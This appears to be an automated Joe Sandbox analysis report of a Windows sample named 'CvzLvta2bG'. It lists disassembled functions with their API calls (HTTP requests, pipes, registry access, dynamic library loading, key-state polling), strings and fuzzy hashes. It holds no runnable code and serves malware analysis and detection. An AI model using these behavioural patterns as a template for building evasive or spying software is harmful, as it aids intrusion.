Function 00E58E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E58F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E58F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00E58F57

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

Strings

ListBox, xrefs: 00E58ED3
ComboBox, xrefs: 00E58E9E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: df728a91bda0b3891578ee392430dfbbc7248eca0c6b0d387b6fbf22d921fa61
Instruction ID: 78f205381124b11ac318bc0a88a0a0f67ee51993ecfa20e2f21386a3717b41f4
Opcode Fuzzy Hash: df728a91bda0b3891578ee392430dfbbc7248eca0c6b0d387b6fbf22d921fa61
Instruction Fuzzy Hash: D1210471A00108BEDB14ABB0DC45CFFB7A9DF45360B146A29F865B71E1DF39184DDA60

Function 00E7182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E7184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E718A2
InternetCloseHandle.WININET(00000000), ref: 00E718E9

Part of subcall function 00E72483: GetLastError.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E72498
Part of subcall function 00E72483: SetEvent.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E724AD

Strings

, xrefs: 00E71893

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 55c7d80fb4589e4d4c75f9c667777e037cb269f40852ee64334a725d976f48c6
Instruction ID: 56c42544eb0b38a5b4bc35fd0e059f88a072ffa5f0f12ace6da841bfdba2bd90
Opcode Fuzzy Hash: 55c7d80fb4589e4d4c75f9c667777e037cb269f40852ee64334a725d976f48c6
Instruction Fuzzy Hash: 1921B0B1500308BFFB119F69DC85EBB77EDEB48748F10916AF549B2140EA258D0557A1

Function 00E863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E86461
LoadLibraryW.KERNEL32(?), ref: 00E86468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E8647D
DestroyWindow.USER32(?), ref: 00E86485

Strings

SysAnimate32, xrefs: 00E8643C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
Instruction ID: 78135c12e7bcfab3d5755f09de77307042c7b88b21278778ff3332eb23dbcd2e
Opcode Fuzzy Hash: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
Instruction Fuzzy Hash: 5A215E71110205AFEF106F64DC80EBF77A9FB59368F206629FA2CB61A0D7719C91A760

Function 00E66D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00E66DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66DEF
GetStdHandle.KERNEL32(0000000C), ref: 00E66E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E66E3B

Strings

nul, xrefs: 00E66E36

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
Instruction ID: dc11096d290093898ae178903075a4fe8ed3b4769cafba95a11289d47092bd07
Opcode Fuzzy Hash: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
Instruction Fuzzy Hash: 4821A474650309AFDB20AF29EC05A9AB7F8EF447A4F205629FCA0F72D0DB719954CB50

Function 00E66E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E66E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66EBB
GetStdHandle.KERNEL32(000000F6), ref: 00E66ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E66F06

Strings

nul, xrefs: 00E66F01

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
Instruction ID: ab9a3af91619195871d1c5ee30e6803f0fe81ef759d24567dfc81b2ea83a98e2
Opcode Fuzzy Hash: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
Instruction Fuzzy Hash: 002192795503059FDB209F69EC04A9AB7E8AF45764F200B19F8A0F72D0DB71A950C750

Function 00E6AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E6AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E6ACA8
__swprintf.LIBCMT ref: 00E6ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00E8F910), ref: 00E6ACFF

Strings

%lu, xrefs: 00E6ACBB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 407fc98f8e47b60096f1bc38815a32dde501249c2c6951107a4bbc5226e6c5cc
Instruction ID: 0f04681cb3ddf90f03e205c3bd4eb2d9f05f978688dd30f98526e837b4f51651
Opcode Fuzzy Hash: 407fc98f8e47b60096f1bc38815a32dde501249c2c6951107a4bbc5226e6c5cc
Instruction Fuzzy Hash: C7217430A00109AFCB10DF65D985DEE7BF8FF89314B005469F909BB252DA31EA45CB21

Function 00E61142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E6115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E61184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E6118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E611C1

Strings

@, xrefs: 00E6119D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @
API String ID: 2875609808-411606354
Opcode ID: f7b7b1f0edee195717a716e4f04ba10627152076fb2fec968138fa86e822d96e
Instruction ID: c2201311fd2031ca708c43346c6345459d1eef3b4911c1bcd5c24b0abff5ab92
Opcode Fuzzy Hash: f7b7b1f0edee195717a716e4f04ba10627152076fb2fec968138fa86e822d96e
Instruction Fuzzy Hash: 98117C31C4262CDBCF019FA5E848AEEBBB8FF0A791F044096EA85B2241CB349554CB91

Function 00E61AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E61B19

Strings

EXISTS, xrefs: 00E61B41
APPEND, xrefs: 00E61B52
REMOVE, xrefs: 00E61B1F
KEYS, xrefs: 00E61B30

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 4cbdb2eee1015ee027adc7c7a2b6229c2dc090618b8bc7e61bbc3a3da423aa18
Instruction ID: 6b4a913ad3da4df3a43df7d8a9131c29e5b227a9ce46afb7bd3bf460a1556117
Opcode Fuzzy Hash: 4cbdb2eee1015ee027adc7c7a2b6229c2dc090618b8bc7e61bbc3a3da423aa18
Instruction Fuzzy Hash: 29115E71940218CFCF00EF94E9928EEB7B4FF65348B5464A9D815B7292EB325D06CB90

Function 00E7EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E7ED6A
CloseHandle.KERNEL32(?), ref: 00E7EDEB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 200e8ae750ddcd09046641698fbc85408e3876f184928a57036606c6c063783a
Instruction ID: d893d18ea2a8678859501637f888dd843eb4b71024d2f9b8dcf20255b7cc191c
Opcode Fuzzy Hash: 200e8ae750ddcd09046641698fbc85408e3876f184928a57036606c6c063783a
Instruction Fuzzy Hash: 83814EB16007009FD724EF28C886F6AB7E5AF48714F14D95DFA99AB3D2D770AC408B52

Function 00E80037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E8013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E80183
RegCloseKey.ADVAPI32(?,?), ref: 00E801AF
RegCloseKey.ADVAPI32(00000000), ref: 00E801BC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 79cb16855b0affd025c20d88e03a2c5f37b1341601e79ee079de02235f82d347
Instruction ID: 2d8d77a04faceba893ae2f2bf9a04b6876a77c4fcc0b58931e9780b02a4ed202
Opcode Fuzzy Hash: 79cb16855b0affd025c20d88e03a2c5f37b1341601e79ee079de02235f82d347
Instruction Fuzzy Hash: 84515C71208304AFD714EF58CC85E6AB7E9FF84314F40992DF599A72A2DB31E948CB52

Function 00E7D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7D927
GetProcAddress.KERNEL32(00000000,?), ref: 00E7D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00E7D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00E7DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DA21

Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: ffadd3d0153caea0fbf252bcca511bc742b8bc511053bba81d7c338ec07de4e9
Instruction ID: 763547299151983dec3567e060bc9d3df7480e5475368098e70dde975156d12b
Opcode Fuzzy Hash: ffadd3d0153caea0fbf252bcca511bc742b8bc511053bba81d7c338ec07de4e9
Instruction Fuzzy Hash: E9510335A04209DFCB00EFA8C8849A9BBF4FF49324B54D065E959BB352D731AD85CF90

Function 00E6E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E6E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E6E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E6E687

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E6E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E6E6B4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 705edff76110792d9b01067ba86a5203402fd02e089d5c1136243702924d22b6
Instruction ID: f2a6b26a274e043c7a5115c247c79d75b7bec4ca820e537dd8e3f04acfd03d58
Opcode Fuzzy Hash: 705edff76110792d9b01067ba86a5203402fd02e089d5c1136243702924d22b6
Instruction Fuzzy Hash: 4A513D75A00105DFCB05EF64D981AAEBBF5EF09314B1494A5E809BB3A2CB31ED51CF60

Function 00E8A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f63b2ec67eba8112835aaf93fd1b1f9d5a70da6fc8a45dd2c9f4f96a9fd9ba
Instruction ID: abe991bf4ae2faafb60edd1ba4394d19eddce78f58634048b684195a17a6626c
Opcode Fuzzy Hash: 37f63b2ec67eba8112835aaf93fd1b1f9d5a70da6fc8a45dd2c9f4f96a9fd9ba
Instruction Fuzzy Hash: 6A41B275905104AFE724EF68CC48FA9BBA4EB09314F181276F81DB72E1C730AD45DB51

Function 00E02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E02357
ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
GetAsyncKeyState.USER32(00000001), ref: 00E02399
GetAsyncKeyState.USER32(00000002), ref: 00E023A7

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 08e17622325d2b07fcf91c080e3ed065236b0c264034a57c8660d51ff0c2e170
Instruction ID: 525801f837447327a2b6abab78866abd67afb6b460192394b4e3775838f29df1
Opcode Fuzzy Hash: 08e17622325d2b07fcf91c080e3ed065236b0c264034a57c8660d51ff0c2e170
Instruction Fuzzy Hash: D6419D3560411AFBCF199F68CC48AE9BBB5BB05324F20535AE929B22E0C7349994DF90

Function 00E563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00E56433
TranslateMessage.USER32(?), ref: 00E5645C
DispatchMessageW.USER32(?), ref: 00E56466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E56475

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 7ee2afcb6b901d34c3207ba2332296bfe4c6f5e51f267201201d3de8347ff98c
Instruction ID: 53a551d8f08ee1360d03f8cb9ac25b2515bf930847a3ac3935aab1d063684d68
Opcode Fuzzy Hash: 7ee2afcb6b901d34c3207ba2332296bfe4c6f5e51f267201201d3de8347ff98c
Instruction Fuzzy Hash: 063183325006469FDB648FB1DC44FA67BB8BB01306F941975E825E31B1E725A4CDD750

Function 00E58A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E58A30
PostMessageW.USER32(?,00000201,00000001), ref: 00E58ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E58AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00E58AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E58AF8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
Instruction ID: d9809994ed73a0f477be0838b7fbb527657164605c114021d86526f48f67f934
Opcode Fuzzy Hash: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
Instruction Fuzzy Hash: 5331D171500219EFDF14CF68DA4CA9E3BB5EB04316F10462AF924F71D2C7B09918DB91

Function 00E5B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00E5B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E5B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E5B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E5B27F
_wcsstr.LIBCMT ref: 00E5B289

Memory Dump Source

